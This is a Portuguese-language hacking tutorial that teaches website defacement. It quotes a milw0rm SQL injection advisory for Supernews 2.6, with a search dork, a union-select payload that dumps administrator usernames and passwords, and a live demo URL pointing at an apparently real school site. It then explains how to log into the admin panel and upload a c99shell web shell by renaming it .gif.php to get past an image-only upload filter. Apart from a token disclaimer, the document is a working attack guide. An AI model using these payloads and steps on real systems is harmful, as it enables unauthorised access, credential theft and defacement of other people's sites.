Tutorial por: Cintra

---Antes de você inicar a leitura é importante saber que este conteudo é de apenas para conhecimento não faça mau uso deste conhecimento.---

 

Aprendendo alguma entre as várias tecnicas de realizar Deface em sites, sem possuir a senha do administrador.

 

Para iniciar voce deve possuir noção de como funciona o Remote SQL Injection pois será a partir dele que iremos obter a senha…

O codigo malicioso do Supernews 2.6 foi retirado do site milw0rm.com :

############################################################### 
	Supernews 2.6 SQL Injection Vulnability 
############################################################### 
 
Download: http://phpbrasil.com/script-download/vT0FaOCySSH/5817 
 
############################################################### 
	Discovered by Observing and DD3str0y3r 
	   [Collaps3 CREW] - Made In Brazil 
############################################################### 
 
Dork: Supernews 2.6 
 
####################################################################################################################################### 
 
Example: 
http://wwww.site.com/path/news_any_id=12+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login-- 
 
LiveDEMO: 
http://ead.saomateus.edu.br/supernews/index.php?noticia=10+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login-- 
 
####################################################################################################################################### 
 
gr33tz: W4n73d, M4v3RiCk, 0xpoint, Ferror, Red Eye, Lady_lara and all my friends 
 
# milw0rm.com [2009-06-03]
Primeiro voce deve ler e interpretar, 
iniciaremos por “Dork: Supernews 2.6”, esta frase esta nos ditando o que deveremos procurar no google, bing, yahoo… para 
poder localizar o site ideal a ser inserido o codigo malicioso.
A imagem abaixo mostra um exemplo de site vulneravel.
     
Agora iremos colocar a string como é feito no exemplo do milw0rm 
em frente ao número da noticia voce coloca: +union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login-- 
Pronto! usuario e senha do administrador serão exibidas em baixo da ultima noticia!!!
Nesse caso é muito facil para se logar no painel de administrador, no canto esquerdo esta escrito “Administrador”,
basta clicar e inserir o usuario e senha que voce obteu anteriormente… Você estará dentro do painel administrativo
de noticias do site.
Então voce me pergunta isso basta para nós? Se fosse um site qualquer eles poderiam parar a explicação aqui, mas para
nós nao é o suficiente, queremos obter acesso ao site total, podendo mudar a sua página inicial por uma de sua preferencia.
 
Para fazer isso voces deveram estudar um pocu sobre c99shell, ou qualquer outra… Após conhecer este conhecimento, você
deverá upar sua shell no site.
 
Então voce me pergunta.. “mas o site aceita apenas imagem como faço para upar?”
Meu caro pequeno leitor a respostas é muito simples:
Quando voce obtiver a sua shell ela estará com o nome nomequalquer.php basta voce colocar nomequalquer.gif.php
PRONTO! O site irá autorizar voce upar a shell pois ele irá pensar que é um gif e nao irá ler o resto…
Agora basta voce acessar no site sua shell exemplo: 
www.sitevulneravel.com/nomequalquer.gif.php
 
Espero que voces tenham gostado e até a proxima explicação! 
Make a Free Website with Yola.